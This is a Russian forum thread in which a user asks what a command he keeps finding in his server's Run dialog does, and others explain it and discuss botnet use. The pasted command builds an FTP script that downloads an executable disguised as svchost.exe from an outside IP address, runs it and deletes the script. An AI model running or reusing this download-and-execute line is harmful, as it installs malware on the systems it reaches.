1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.

Попытка взлома компа удаленно

Тема в разделе "Софт", создана пользователем LORIC, 20.05.09.

  1. LORIC

    LORIC Активный участник

    10.570
    16
    У меня стоит комп выполняющий роль сервера, честно говоря если его взломают из сети, мне пофиг, так как там ничего ценного ничего нет.
    Постоянно наблюдаю там открытое окно "Выполнить" и вот такая строка:
    %systemroot%\system32\cmd.exe
    cmd /c echo open 92.243.1.94 21 >> ik &echo user dbot mydick >> ik &echo binary >> ik &echo get svchost.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &svchost.exe &exit

    Можете спецы пояснить что они пытаются там сделать? Чем это грозит компу? :)
     
  2. Unnamed

    Unnamed Активный участник

    814
    0
    Этой командой создаётся файл сценария для виндового фтп-клиента, который качает с фтп-сервера 92.243.1.94 файл svchost.exe, запускает его, удаляет файл сценария, чтобы ты его не нашёл. И всё. После этого у тебя в списке процессов появляется ещё один svchost.exe -- только что скачанный вирус. Всё просто. :)
     
  3. LORIC

    LORIC Активный участник

    10.570
    16
    Unnamed, касперский его определит?
     
  4. Unnamed

    Unnamed Активный участник

    814
    0
    Без понятия. Проверяй.
     
  5. pm

    pm Активный участник

    788
    0
    а потом мы все дружно не любим спам
     
  6. LORIC

    LORIC Активный участник

    10.570
    16
    pm, на том комне нет не аси, почты, вообще ничего кроме фильмов и музыки. Так что пофиг, там нечего украсть, раве что только винты отформатировать... это будет уже подло...
     
  7. rr

    rr Активный участник

    7.874
    1
    LORIC,
    фигня, зато есть сетевое соединение и интернет, можно поставить бота, который будет потом спамить по всему миру.

    добавлено через 31 секунду
    что, кстати, может быть и наказуемо
     
  8. Grandmaster Flash

    Grandmaster Flash Активный участник

    4.368
    0
    Замечательный сервер, ни файра, ни антивиря.
     
  9. Z@@

    Z@@ Активный участник

    2.692
    0
    Интересно если окно выполнить открыто значит они как то уже логиняться на машину? Зачем тогда скрытно выполнять сценарий?
     
  10. Алек :) ГЫ

    Алек :) ГЫ Читатель

    6.659
    0
    ну и чо... у мя дома две железяки, сидящие в сети, и на них не установлено ни файра ни антивиря... и нафиг они не нужны там :)
     
  11. Alfey

    Alfey Активный участник

    3.813
    0
    Алек :) ГЫ,
    А то что канал левым трафиком забивается и как следствие, снижается скорость доступа к интернету, вас не волнует?
     
  12. Алек :) ГЫ

    Алек :) ГЫ Читатель

    6.659
    0
    Alfey,

    абсолютно не волнует - левого трафика просто нет :)
     
  13. Grandmaster Flash

    Grandmaster Flash Активный участник

    4.368
    0
    Там они и не нужны, а сервер похоже имеет прямое подключение к инету. Конечно по стройке можно без каски гулять и рядом с фрезером работающим переодеватся.
     
  14. pm

    pm Активный участник

    788
    0
    а никто и не собирается оттуда что-то воровать (нечего) или стирать (незачем)
    задача - рассылать спам-почту с твоего IP адреса (забивая тебе канал инета)
    ну и можно в DDoS поучаствовать...